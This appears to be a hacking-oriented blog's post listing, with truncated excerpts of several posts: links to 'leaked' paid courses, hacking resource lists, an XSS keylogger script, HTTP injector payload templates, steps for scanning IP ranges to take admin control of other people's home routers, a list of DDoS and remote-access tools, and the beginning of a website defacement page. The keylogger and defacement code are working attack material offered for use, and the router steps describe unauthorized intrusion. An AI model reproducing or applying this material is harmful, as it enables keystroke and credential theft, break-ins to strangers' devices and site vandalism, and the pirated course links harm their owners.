Skip to main content

Posts

Technical Sagar Paid Courses for free

* Technical Sagar All Course** Leaked By http *Quick hack(technical sagar)*  https://www.mediafire.com/download/mrcz8aa7ji05a2m *Tech Master (Technical Sagar)* https://www.mediafire.com/?umk316gpoy3tlbg *Money making (technical sagar)* http://www.mediafire.com/file/9scal11vbu97tyo/Money_Making.zip ,

Remember anything

https://m.youtube.com/watch?t=1s&v= N8WDKAkYA9o

https://www.bleepingcomputer.com/news/security/android-monero-mining-malware-can-cause-device-failure/

https://www.bleepingcomputer.com/news/security/android-monero-mining-malware-can-cause-device-failure/

download a copy of your Facebook data:

 download a copy of your Facebook data: Click   at the top right of any Facebook page and select  Settings .Click  Download a copy of your Facebook data  below your General Account Settings.Click  Start My Archive . Keep in mind that we have measures in place to help ensure the security of your information. We require you to confirm your identity to complete the download process. You will not be able to access the information until you have completed the security check. You can check to see whether we have your credit card information stored by clicking  Settings > Payments . From there, you may choose to change or delete stored credit card information.

CISSP modules | Go Hacking | Hacker | Cyber Security | Future Scope

CISSP Module1 http://www.mediafire.com/file/x3zeprhl92pad8v/CISSP_Module_1_Security_and_Risk_Management.rar CISSP Module 2 http://www.mediafire.com/file/d9acozildd28f5b/CISSP_Module_2_Asset_Security.rar CISSP Module 3 http://www.mediafire.com/file/bn8xf99fe3obo37/CISSP_Module_3_Security_Engineering.rar CISSP Module 4 http://www.mediafire.com/file/znr4pbbbn9qcges/CISSP_Module_4_Communication_and_Network_Security.rar CISSP Module 5 http://www.mediafire.com/file/gdppws5602q99m6/CISSP_Module_5_Identity_and_Access_Management.rar CISSP Module 6 http://www.mediafire.com/file/wpwwr58ba2cpva3/CISSP_Module_6_Security_Assessment_Testing.rar CISSP Module 7 http://www.mediafire.com/file/1yn1ilhrrxj3ci9/CISSP_Module_7_Security_Operations.rar CISSP Module 8 http://www.mediafire.com/file/6azb12untw5itww/CHFI_Module_8_Windows_Forensics.rar CISSP Module 9 http://www.mediafire.com/file/3dzf4qdln3pn6qi/CHFI_Module_9_Data_Acquisition_and_Duplication.rar CISSP Module 10 http://www.mediafi

Learn hacking Resources

Code Issues 0 Pull requests 1 Pulse Personal Resources.txt For Start...... http://teamultimate.in/ http://teamultimate.in/start-here/ http://null-byte.wonderhowto.com/ http://www.hackingarticles.in/ https://www.cybrary.it/ https://www.computersecuritystudent.com/ http://breakthesecurity.cysecurity.org/p/hacking-tutorials-for-beginners.html http://www.guru99.com/learn-penetration-testing.html http://back-track-linux.blogspot.in/2012/11/backtrack-penetration-testing-tutorial.html https://community.rapid7.com/docs/DOC-2248 https://www.soldierx.com/tutorials/Pentesting-Tutorial-1-Information-Gathering-Part-1-Nmap https://www.owasp.org/index.php/Category:How_To http://www.ranum.com/security/computer_security/editorials/dumb/index.html http://www.developer.com/java/data/article.php/10932_3667601_1 https://dzone.com/articles/10-steps-to-secure-software Cryptography Related Tutorials : https://developer.mozilla.org/en-US/docs/Archive/Security/Introduction_to_Public-Key_Cryp

XSS keylogger

Keylogger Xss js sample /keylogger // http://.com/lab/webapp/jfp/7 <script> document.forms[0].addEventListener('submit',function(){ new Image().src = "http://localhost:8000/?key="+cap; }); var cap = ''; window.addEventListener("keypress",function(event){ switch(event.which) {     case 13:         cap +='<ENTER>';         break;     case 9:         cap += "<TAB>";         break;     case 8:     if(cap.length != 0){             cap = cap.substring(0, cap.length-1);     }         break;     default:         cap +=String.fromCodePoint(event.which); } }); </script>

Http injector

Http Injector List of Injection methods 1.Normal CONNECT [host_port] [protocol][crlf]Host: domain.com [crlf][crlf] 2.Front Inject GET http://domain.com / HTTP/1.1[crlf]Host: domain.com [crlf][crlf]CONNECT [host_port] [protocol][crlf][crlf] 3.Front Query  CONNECT domain.com @[host_port][crlf]GET http://domain.com / [protocol][crlf]Host: domain.com [crlf][crlf] 4.Back Inject CONNECT [host_port] HTTP/1.1[crlf][crlf]GET http://domain.com / [protocol][crlf]Host: domain.com [crlf][crlf] 5.Back Query CONNECT [host_port]@domain .com[crlf]GET http://domain.com / [protocol][crlf]Host: domain.com [crlf][crlf] Troubleshoot♂¶ 🙅302 Error code - If you are  302 HTTP header code that means your ISP is redirecting your request to their captive portal page. Normally ISP blacklisted your remote proxy or the HTTP Payload. 🙅400 Error code - This indicate that your payload is invalid and can't be understand by remote proxy Connection timeout - It could be that your network connection i

Find any router password

♻️How to Hack the Home Routers and gain the Admin Rights… 💮Requirements: Port Scanner (zenmap,superscan or unicornscan.I use Zenmap) Web Browser (Chrome,Firfox or Safari) Internet Connection(Any kind of Internet connection) First of all I want to tell you why I use Zenmap because Nmap is the best friend of hackers and Zenmap is the graphical user interface of nmap. Instruction on How to Hack the Home Routers and gain the Admin Rights… 1. We should select an IP range. I have selected IP range that includes my public IP address. XXX.XXX.30.0-XXX.XXX.30.255 2. Now let’s scan for home routers. When you finished your scan, You can find IP addresses which has open ports such as http port(80), ftp port(21) and telnet port(23). I have found many IP addesses with port 80 is opened. So I stopped my scan. 3. Now you can access these addesses using your web browser because http port is opened and we need to find whether the web page is router log in page. 4. If you see the alert err

Recover deleted pic

How to recover deleted image or video from android (internal storage) without root ? STEP 1: DOWNLOAD AND INSTALL JIHOSOFT ANDROID PHONE RECOVERY AT YOUR COMPUTER. You could download the Windows version at: Android Recovery , download Mac version at: Android Recovery for Mac . After download, you will be lead to install the app at your computer. STEP 2: SELECT DATA GENRE THAT YOU NEED TO SCAN After installation, run the app at your PC. You will see the interface show you four options: “Mul”, “Database”, “WhatsApp”, “All”. Tap One of it according to your own demand. STEP 3: IDENTIFY ANDROID PHONE OR TABLET BY COMPUTER. First, connect your android device to computer via USB cable. Then, turn on USB debugging at android equipment. If the app failed to identify your equipment, install related USB driver at your computer. STEP 4: SCAN ANDROID DEVICE AND EXPECT THE RESULT After identification, click "Start" for scanning. Please be patient about the process

Varius hacking

1-DDoS 2-Forensics 3-Programming 4-Exploitation 5-Phone Hacking 6-Server Hacking 7-Client Hacking 8-Website Hacking 9-Network Hacking 10-Wireless Hacking 11-Reverse Engeenering 12-Information Gathering #DDoS 1-MDK3 2-LOIC 3-HULK 4-DDOSIM 5-Ufonet 6-Hping3 7-Xerxes 8-Hammer 9-Slowloris 10-Websploit 11-GoldenEye 12-Metasploit 13-Aireplay-ng 14-Slowhttptest #Forensics 1-COFEE 2-Volafox 3-Autopsy 4-Foremost 5-Hashdeep 6-Binwalk #Programming 1-Notepad++ 2-Visual Studio 3-Text Editor #Exploitation 1-Metasploit 2-Sqlmap 3-Core Imact 4-W3af 5-BeEF 6-Dradis #Phone_Hacking 1-Metasploit 2-Apktool 3-Droidjack 4-AndroRAT 5-Spynote #Server_Hacking 1-SQLmap 2-Jsql 3-Havij 4-Hydra 5-Metasploit 6-Armitage 7-Brupsuite 8-Owasp-ZAP 9-Netsparker 10-Acunetix 11-OpenVAS #Client_Hacking 1-Darkcomet 2-FatRat 3-Veil-Evasion 4-Shallter 5-Unicorn 6-Setoolkit 7-Armitage 8-BeEF-Framework 9-EmPyre 10-FakeImageExploiter 11-Pupy 12-DFU-Programm

Deface page

Code of deface page..... [8/6, 4:47 PM] ‪ +91 97998 89428 ‬: <!------------ COded By Cyb3rD3v1L --------> <link rel="icon" type="image/gif" href=" http://www.crossed-flag-pins.com/animated-flag-gif/gifs/India_120-animated-flag-gifs.gif "> <html> <head><script type='text/javascript'> var msg = "LOL!! Guess what?! you got owned :v h "; msg = " " + msg;pos = 0; function scrollTitle() { document.title = msg.substring(pos, msg.length) + msg.substring(0, pos); pos++; if (pos > msg.length) pos = 0 window.setTimeout("scrollTitle()",300); } scrollTitle(); </script> <script language=JavaScript> var message="NO NO NO YOU CAN'T xD"; function clickIE4(){ if (event.button==2){ alert(message); return false; } } function clickNS4(e){ if (document.layers||document.getElementById&&!document.all){ if (e.which==2||e.which==3){ alert(message); retu